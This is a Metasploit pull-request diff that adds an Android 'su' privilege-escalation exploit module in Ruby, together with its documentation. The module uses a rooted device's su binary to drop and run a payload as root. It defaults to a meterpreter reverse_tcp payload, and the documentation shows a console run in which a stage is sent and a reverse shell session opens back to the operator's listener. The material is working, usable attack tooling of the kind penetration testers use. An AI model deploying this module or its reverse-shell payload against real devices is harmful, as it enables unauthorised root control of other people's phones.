Land #10012, Add an Android module to run payloads with su on a rooted device

documentation/modules/exploit/android/local/su_exec.md

@@ -0,0 +1,57 @@
+## Description
+
+This module uses the su binary present on rooted devices to run a payload as root.
+
+A rooted Android device will contain a su binary (often linked with an application) that allows the user to run commands as root.
+This module will use the su binary to execute a command stager as root. The command stager will write a payload binary to a
+temporary directory, make it executable, execute it in the background, and finally delete the executable.
+
+On most devices the su binary will pop-up a prompt on the device asking the user for permission.
+
+## Vulnerable Application
+
+This module will only work on *rooted* devices. An off the shelf Android device is unlikely to be rooted, however it's possible to root a device without losing the data.
+Many devices can be rooted by flashing new firmware, however the existing data will be lost.
+
+## Verfication steps
+
+You'll first need to obtain a session on the target device. To do this follow the instructions [here](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/payload/android/meterpreter/reverse_tcp.md)
+
+Once the module is loaded, one simply needs to set the `SESSION` option and configure the handler. 
+An example session follows:
+
+```
+msf5 exploit(multi/handler) > sessions
+
+Active sessions
+===============
+
+  Id  Name  Type                        Information         Connection
+  --  ----  ----                        -----------         ----------
+  1         meterpreter dalvik/android  u0_a80 @ localhost  192.168.0.176:4444 -> 192.168.0.107:46059 (192.168.0.107)
+
+msf5 exploit(multi/handler) > use exploit/android/local/su_exec
+msf5 exploit(android/local/su_exec) > set SESSION 1
+SESSION => 1
+msf5 exploit(android/local/su_exec) > set payload linux/aarch64/meterpreter/reverse_tcp
+payload => linux/aarch64/meterpreter/reverse_tcp
+msf5 exploit(android/local/su_exec) > set LHOST 192.168.0.176
+LHOST => 192.168.0.176
+msf5 exploit(android/local/su_exec) > set LPORT 4445
+LPORT => 4445
+msf5 exploit(android/local/su_exec) > run
+
+[!] SESSION may not be compatible with this module.
+[*] Started reverse TCP handler on 192.168.0.176:4445
+[*] Transmitting intermediate midstager...(256 bytes)
+[*] Sending stage (818780 bytes) to 192.168.0.107
+[*] Meterpreter session 2 opened (192.168.0.176:4445 -> 192.168.0.107:49710) at 2018-10-01 17:44:50 +0800
+[-] Exploit failed: Rex::TimeoutError Operation timed out.
+[*] Exploit completed, but no session was created.
+
+```
+
+Please not that in most cases you will have to manually confirm the Superuser prompt 
+on the device itself before the module completes. You can do `set WfsDelay 10` to
+give yourself more time.
+

modules/exploits/android/local/su_exec.rb

@@ -0,0 +1,85 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ManualRanking
+
+  include Msf::Exploit::CmdStager
+  include Msf::Post::File
+  include Msf::Post::Android::Priv
+
+  def initialize(info={})
+    super( update_info( info, {
+      'Name'           => "Android 'su' Privilege Escalation",
+      'Description'    => %q{
+          This module uses the su binary present on rooted devices to run
+          a payload as root.
+
+          A rooted Android device will contain a su binary (often linked with
+          an application) that allows the user to run commands as root.
+          This module will use the su binary to execute a command stager
+          as root. The command stager will write a payload binary to a
+          temporary directory, make it executable, execute it in the background,
+          and finally delete the executable.
+
+          On most devices the su binary will pop-up a prompt on the device
+          asking the user for permission.
+      },
+      'License'        => MSF_LICENSE,
+      'DisclosureDate' => 'Aug 31 2017',
+      'SessionTypes'   => [ 'meterpreter', 'shell' ],
+      'Platform'       => [ 'android', 'linux' ],
+      'Arch'           => [ ARCH_AARCH64, ARCH_ARMLE, ARCH_X86, ARCH_X64, ARCH_MIPSLE ],
+      'Targets'        => [
+        ['aarch64',{'Arch' => ARCH_AARCH64}],
+        ['armle',  {'Arch' => ARCH_ARMLE}],
+        ['x86',    {'Arch' => ARCH_X86}],
+        ['x64',    {'Arch' => ARCH_X64}],
+        ['mipsle', {'Arch' => ARCH_MIPSLE}]
+      ],
+      'DefaultOptions' => {
+        'PAYLOAD' => 'linux/aarch64/meterpreter/reverse_tcp',
+        'WfsDelay' => 5,
+      },
+      'DefaultTarget'  => 0,
+      }
+    ))
+    register_options([
+      OptString.new('SU_BINARY', [true, 'The su binary to execute to obtain root', 'su']),
+      OptString.new('WritableDir', [true, 'Writable directory', '/data/local/tmp/']),
+    ])
+  end
+
+  def base_dir
+    datastore['WritableDir'].to_s
+  end
+
+  def su_bin
+    datastore['SU_BINARY'].to_s
+  end
+
+  def exploit
+    if is_root?
+      fail_with Failure::BadConfig, 'Session already has root privileges'
+    end
+
+    linemax = 4088 - su_bin.size
+    execute_cmdstager({
+      flavor: :echo,
+      enc_format: :octal,
+      prefix: '\\\\0',
+      temp: base_dir,
+      linemax: linemax,
+      background: true,
+    })
+  end
+
+  def execute_command(cmd, opts)
+    su_cmd = "#{su_bin} -c '#{cmd}'"
+    cmd_exec(su_cmd)
+  end
+
+end
+